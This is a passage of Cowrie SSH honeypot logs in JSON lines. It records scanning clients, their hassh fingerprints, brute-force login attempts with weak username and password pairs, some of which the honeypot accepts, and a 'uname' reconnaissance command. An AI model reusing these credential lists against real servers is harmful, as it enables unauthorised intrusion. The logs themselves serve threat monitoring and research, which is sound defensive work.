sa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:33:49.851967Z","src_ip":"41.226.27.251","session":"fcb0a334659d"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic123","message":"login attempt [elastic/elastic123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:33:49.981845Z","src_ip":"41.226.27.251","session":"fcb0a334659d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:33:51.198064Z","src_ip":"41.226.27.251","session":"fcb0a334659d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:33:53.236224Z","src_ip":"212.227.235.229","session":"d22614bd3d99"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:33:53.237206Z","src_ip":"212.227.235.229","session":"d22614bd3d99"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:33:56.768376Z","src_ip":"212.227.125.160","session":"d757d33c4a66"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:33:56.769120Z","src_ip":"212.227.125.160","session":"d757d33c4a66"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"2.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:33:59.586484Z","src_ip":"212.227.125.160","session":"d757d33c4a66"}
{"eventid":"cowrie.session.closed","duration":"48.7","message":"Connection lost after 48.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:33:59.705905Z","src_ip":"212.227.125.160","session":"d757d33c4a66"}
{"eventid":"cowrie.session.connect","src_ip":"91.231.89.211","src_port":42307,"dst_ip":"1.2.3.4","dst_port":22,"session":"38539ee57118","protocol":"ssh","message":"New connection: 91.231.89.211:42307 (1.2.3.4:22) [session: 38539ee57118]","sensor":"my-vps","timestamp":"2025-08-31T02:34:06.112879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-perlssh","message":"Remote SSH version: SSH-2.0-perlssh","sensor":"my-vps","timestamp":"2025-08-31T02:34:06.121918Z","src_ip":"91.231.89.211","session":"38539ee57118"}
{"eventid":"cowrie.client.kex","hassh":"3c0eaacec19ba322a90a5541dac09a06","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5","hmac-sha1","umac-64@openssh.com","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 3c0eaacec19ba322a90a5541dac09a06","sensor":"my-vps","timestamp":"2025-08-31T02:34:06.183919Z","src_ip":"91.231.89.211","session":"38539ee57118"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:34:06.796359Z","src_ip":"91.231.89.211","session":"38539ee57118"}
{"eventid":"cowrie.session.connect","src_ip":"91.231.89.245","src_port":53343,"dst_ip":"1.2.3.4","dst_port":22,"session":"b201b2cf8d35","protocol":"ssh","message":"New connection: 91.231.89.245:53343 (1.2.3.4:22) [session: b201b2cf8d35]","sensor":"my-vps","timestamp":"2025-08-31T02:34:07.109976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-perlssh","message":"Remote SSH version: SSH-2.0-perlssh","sensor":"my-vps","timestamp":"2025-08-31T02:34:07.245918Z","src_ip":"91.231.89.245","session":"b201b2cf8d35"}
{"eventid":"cowrie.client.kex","hassh":"3c0eaacec19ba322a90a5541dac09a06","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5","hmac-sha1","umac-64@openssh.com","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 3c0eaacec19ba322a90a5541dac09a06","sensor":"my-vps","timestamp":"2025-08-31T02:34:07.470145Z","src_ip":"91.231.89.245","session":"b201b2cf8d35"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:34:08.103489Z","src_ip":"91.231.89.245","session":"b201b2cf8d35"}
{"eventid":"cowrie.login.success","username":"root","password":"aA123456","message":"login attempt [root/aA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:34:08.510956Z","src_ip":"212.227.235.229","session":"d22614bd3d99"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":54164,"dst_ip":"1.2.3.4","dst_port":22,"session":"570f185f5f90","protocol":"ssh","message":"New connection: 41.226.27.251:54164 (1.2.3.4:22) [session: 570f185f5f90]","sensor":"my-vps","timestamp":"2025-08-31T02:34:10.134003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:34:10.176619Z","src_ip":"41.226.27.251","session":"570f185f5f90"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:34:10.192284Z","src_ip":"41.226.27.251","session":"570f185f5f90"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rd","message":"login attempt [root/p@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:34:10.358371Z","src_ip":"41.226.27.251","session":"570f185f5f90"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:34:10.477347Z","src_ip":"41.226.27.251","session":"570f185f5f90"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:34:10.478292Z","src_ip":"41.226.27.251","session":"570f185f5f90"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:34:10.524415Z","src_ip":"41.226.27.251","session":"570f185f5f90"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:34:10.525679Z","src_ip":"41.226.27.251","session":"570f185f5f90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50390,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca16bf98f1b9","protocol":"ssh","message":"New connection: 212.227.235.229:50390 (1.2.3.4:22) [session: ca16bf98f1b9]","sensor":"my-vps","timestamp":"2025-08-31T02:34:13.084360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:34:13.835112Z","src_ip":"212.227.235.229","session":"ca16bf98f1b9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:34:13.835801Z","src_ip":"212.227.235.229","session":"ca16bf98f1b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:34:15.471183Z","src_ip":"212.227.235.229","session":"d22614bd3d99"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:34:15.471849Z","src_ip":"212.227.235.229","session":"d22614bd3d99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40674,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cc5ab28d40d","protocol":"ssh","message":"New connection: 212.227.125.160:40674 (1.2.3.4:22) [session: 0cc5ab28d40d]","sensor":"my-vps","timestamp":"2025-08-31T02:34:16.383378Z"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456789","message":"login attempt [es/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T02:34:19.760955Z","src_ip":"212.227.235.229","session":"ca16bf98f1b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"4.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:34:19.922894Z","src_ip":"212.227.235.229","session":"d22614bd3d99"}
{"eventid":"cowrie.session.closed","duration":"33.8","message":"Connection lost after 33.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:34:19.924065Z","src_ip":"212.227.235.229","session":"d22614bd3d99"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:34:20.842508Z","src_ip":"212.227.125.160","session":"0cc5ab28d40d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:34:20.843191Z","src_ip":"212.227.125.160","session":"0cc5ab28d40d"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:34:21.672543Z","src_ip":"212.227.235.229","session":"ca16bf98f1b9"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":50024,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b301a6a0f7b","protocol":"ssh","message":"New connection: 41.226.27.251:50024 (1.2.3.4:22) [session: 0b301a6a0f7b]","sensor":"my-vps","timestamp":"2025-08-31T02:34:31.000431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:34:31.078504Z","src_ip":"41.226.27.251","session":"0b301a6a0f7b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:34:31.079907Z","src_ip":"41.226.27.251","session":"0b301a6a0f7b"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:34:31.256113Z","src_ip":"41.226.27.251","session":"0b301a6a0f7b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35146,"dst_ip":"1.2.3.4","dst_port":22,"session":"45f5afb821fe","protocol":"ssh","message":"New connection: 212.227.235.229:35146 (1.2.3.4:22) [session: 45f5afb821fe]","sensor":"my-vps","timestamp":"2025-08-31T02:34:31.805537Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:34:32.496050Z","src_ip":"41.226.27.251","session":"0b301a6a0f7b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40848,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ff56cc19f6c","protocol":"ssh","message":"New connection: 212.227.125.160:40848 (1.2.3.4:22) [session: 8ff56cc19f6c]","sensor":"my-vps","timestamp":"2025-08-31T02:34:34.874943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:34:35.388980Z","src_ip":"212.227.125.160","session":"8ff56cc19f6c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:34:35.389678Z","src_ip":"212.227.125.160","session":"8ff56cc19f6c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:34:35.861162Z","src_ip":"212.227.235.229","session":"45f5afb821fe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:34:35.878376Z","src_ip":"212.227.235.229","session":"45f5afb821fe"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456789","message":"login attempt [es/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T02:34:37.263911Z","src_ip":"212.227.125.160","session":"8ff56cc19f6c"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:34:38.752358Z","src_ip":"212.227.125.160","session":"8ff56cc19f6c"}
{"eventid":"cowrie.login.failed","username":"esroot","password":"esroot","message":"login attempt [esroot/esroot] failed","sensor":"my-vps","timestamp":"2025-08-31T02:34:48.896813Z","src_ip":"212.227.125.160","session":"0cc5ab28d40d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57180,"dst_ip":"1.2.3.4","dst_port":22,"session":"bddea13bfce6","protocol":"ssh","message":"New connection: 212.227.125.160:57180 (1.2.3.4:22) [session: bddea13bfce6]","sensor":"my-vps","timestamp":"2025-08-31T02:34:51.762085Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":54456,"dst_ip":"1.2.3.4","dst_port":22,"session":"79c43fdf3947","protocol":"ssh","message":"New connection: 41.226.27.251:54456 (1.2.3.4:22) [session: 79c43fdf3947]","sensor":"my-vps","timestamp":"2025-08-31T02:34:51.799134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:34:51.804210Z","src_ip":"41.226.27.251","session":"79c43fdf3947"}
